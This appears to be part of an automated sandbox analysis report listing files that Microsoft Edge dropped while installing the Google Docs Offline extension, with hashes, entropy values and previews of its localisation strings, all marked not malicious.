SHA-512:	427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\ka\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3264
Entropy (8bit):	3.586016059431306
Encrypted:	false
SSDEEP:	48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
MD5:	83F81D30913DC4344573D7A58BD20D85
SHA1:	5AD0E91EA18045232A8F9DF1627007FE506A70E0
SHA-256:	30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
SHA-512:	85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
Malicious:	false
Preview:	{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\kk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3235
Entropy (8bit):	3.6081439490236464
Encrypted:	false
SSDEEP:	96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
MD5:	2D94A58795F7B1E6E43C9656A147AD3C
SHA1:	E377DB505C6924B6BFC9D73DC7C02610062F674E
SHA-256:	548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
SHA-512:	F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
Malicious:	false
Preview:	{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\km\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3122
Entropy (8bit):	3.891443295908904
Encrypted:	false
SSDEEP:	96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
MD5:	B3699C20A94776A5C2F90AEF6EB0DAD9
SHA1:	1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
SHA-256:	A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
SHA-512:	1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
Malicious:	false
Preview:	{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\kn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1895
Entropy (8bit):	4.28990403715536
Encrypted:	false
SSDEEP:	48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
MD5:	38BE0974108FC1CC30F13D8230EE5C40
SHA1:	ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
SHA-256:	30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
SHA-512:	7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\ko\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	5.3945675025513955
Encrypted:	false
SSDEEP:	24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
MD5:	F3E59EEEB007144EA26306C20E04C292
SHA1:	83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
SHA-256:	C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
SHA-512:	7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\lo\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2535
Entropy (8bit):	3.8479764584971368
Encrypted:	false
SSDEEP:	48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
MD5:	E20D6C27840B406555E2F5091B118FC5
SHA1:	0DCECC1A58CEB4936E255A64A2830956BFA6EC14
SHA-256:	89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
SHA-512:	AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
Malicious:	false
Preview:	{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\lt\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1028
Entropy (8bit):	4.797571191712988
Encrypted:	false
SSDEEP:	24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
MD5:	970544AB4622701FFDF66DC556847652
SHA1:	14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
SHA-256:	5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
SHA-512:	CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\lv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	994
Entropy (8bit):	4.700308832360794
Encrypted:	false
SSDEEP:	24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
MD5:	A568A58817375590007D1B8ABCAEBF82
SHA1:	B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
SHA-256:	0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
SHA-512:	FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\ml\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2091
Entropy (8bit):	4.358252286391144
Encrypted:	false
SSDEEP:	24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
MD5:	4717EFE4651F94EFF6ACB6653E868D1A
SHA1:	B8A7703152767FBE1819808876D09D9CC1C44450
SHA-256:	22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
SHA-512:	487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\mn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2778
Entropy (8bit):	3.595196082412897
Encrypted:	false
SSDEEP:	48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
MD5:	83E7A14B7FC60D4C66BF313C8A2BEF0B
SHA1:	1CCF1D79CDED5D65439266DB58480089CC110B18
SHA-256:	613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
SHA-512:	3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
Malicious:	false
Preview:	{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\mr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1719
Entropy (8bit):	4.287702203591075
Encrypted:	false
SSDEEP:	48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
MD5:	3B98C4ED8874A160C3789FEAD5553CFA
SHA1:	5550D0EC548335293D962AAA96B6443DD8ABB9F6
SHA-256:	ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
SHA-512:	5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\ms\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	936
Entropy (8bit):	4.457879437756106
Encrypted:	false
SSDEEP:	24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
MD5:	7D273824B1E22426C033FF5D8D7162B7
SHA1:	EADBE9DBE5519BD60458B3551BDFC36A10049DD1
SHA-256:	2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
SHA-512:	E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\my\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3830
Entropy (8bit):	3.5483353063347587
Encrypted:	false
SSDEEP:	48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
MD5:	342335A22F1886B8BC92008597326B24
SHA1:	2CB04F892E430DCD7705C02BF0A8619354515513
SHA-256:	243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
SHA-512:	CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
Malicious:	false
Preview:	{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\ne\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1898
Entropy (8bit):	4.187050294267571
Encrypted:	false
SSDEEP:	24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
MD5:	B1083DA5EC718D1F2F093BD3D1FB4F37
SHA1:	74B6F050D918448396642765DEF1AD5390AB5282
SHA-256:	E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
SHA-512:	7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\nl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.513485418448461
Encrypted:	false
SSDEEP:	12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
MD5:	32DF72F14BE59A9BC9777113A8B21DE6
SHA1:	2A8D9B9A998453144307DD0B700A76E783062AD0
SHA-256:	F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
SHA-512:	E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\no\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	878
Entropy (8bit):	4.4541485835627475
Encrypted:	false
SSDEEP:	24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
MD5:	A1744B0F53CCF889955B95108367F9C8
SHA1:	6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
SHA-256:	21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
SHA-512:	F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\pa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2766
Entropy (8bit):	3.839730779948262
Encrypted:	false
